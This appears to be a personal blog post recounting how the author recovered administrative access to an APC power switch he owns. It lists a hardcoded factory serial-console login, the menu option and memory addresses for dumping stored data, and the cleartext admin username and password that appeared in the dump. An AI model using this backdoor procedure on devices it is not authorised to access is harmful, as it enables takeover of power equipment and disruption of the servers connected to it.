This morning after being frustrated with getting a USB drive to function properly on linux machine I turned my attention to breaking into an APC Power Switch I had acquired but didn’t have the opportunity to do a reset and recover before I had to install it. This would be simple if I could reset the switch during a reboot, unfortunately in doing this I would reboot several servers that needed to stay up and available.
So I went searching a bit and found that this APC Power Switch is vulnerable to a local attack that would allow you to find what the current administrative user account is defined as as well as the current password associated with that account. The vulnerability was in a different, more recent, version of the software currently being run by the device. I was hopeful that my older version would also be vulnerable.
The first step is to connect to the serial port on the device using a standard null modem cable running at 2400baud 8-N-1. Once you get a User Name : prompt enter apc and the password: TENmanUFactOryPOWER
This will drop you to the Factory Menu that will look like this:
User Name : apc Password : ******************* Factory Menu <ctrl -A> to exit 1AP9606 2WA0033002610 310 408/08/2000 500 C0 B7 63 FA F1 6v2.5.3 7A 8A 9198.180.62.87 A255.255.255.240 B198.180.62.81 C D E F G
The instruction I found indicated at this point to enter 13 which will drop you to this prompt:
Selection> 13 Enter byte address in Hex(XXXX):
The instructions further indicated that the address to view taht would contain the information was: 1d10. However in my version of the software this is what I saw:
Enter byte address in Hex(XXXX): 1d10 1D10 FF FF FF FF FF FF FF FF ........ 1D18 FF FF FF FF FF FF FF FF ........ 1D20 FF FF FF FF FF FF FF FF ........ 1D28 FF FF FF FF FF FF FF FF ........ 1D30 FF FF FF FF FF FF FF FF ........ 1D38 FF FF FF FF FF FF FF FF ........ 1D40 FF FF FF FF FF FF FF FF ........ 1D48 FF FF FF FF FF FF FF FF ........ 1D50 FF FF FF FF FF FF FF FF ........ 1D58 FF FF FF FF FF FF FF FF ........ 1D60 FF FF FF FF FF FF FF FF ........ 1D68 FF FF FF FF FF FF FF FF ........ 1D70 FF FF FF FF FF FF FF FF ........ 1D78 FF FF FF FF FF FF FF FF ........ 1D80 FF FF FF FF FF FF FF FF ........ 1D88 FF FF FF FF FF FF FF FF ........ <sp>nxt,b-bck,p-pch,other-exit
Obviously there is no useful information there. So I started to systematically tr other address locations to see if the information I was seeking was someplace else. After about 5 minutes of trial and error I found the information I was seeking at 1c2:
Enter byte address in Hex(XXXX): 1c2 01C2 FF FF FF FF FF FF FF FF ........ 01CA FF FF FF FF FF FF FF 50 .......P 01D2 46 61 64 6D 69 6E 00 64 Fadmin.d 01DA 6D 69 6E 00 68 69 68 61 min.hiha 01E2 74 31 31 00 00 00 FF 64 t11....d 01EA 65 76 69 63 65 00 FF FF evice... 01F2 FF FF 61 70 63 00 FF FF ..apc... 01FA FF FF FF FF FF 72 6F 62 .....rob 0202 68 61 72 72 69 73 68 61 harrisha 020A 73 61 62 61 62 79 00 FF sababy.. 0212 FF FF FF FF FF FF FF FF ........ 021A FF FF FF FF FF FF 64 65 ......de 0222 76 69 63 65 20 75 73 65 vice use 022A 72 20 70 68 72 61 73 65 r phrase 0232 00 FF FF FF FF FF FF FF ........ 023A FF FF FF FF FF FF FF 00 ........ <sp>nxt,b-bck,p-pch,other-exit
In case you don’t see it the userid is admin and the password is hihat11
After gaining that information I was able to easily login, and reset the password to something I will easily remember as well as configuring the network interface to enable web management of the device.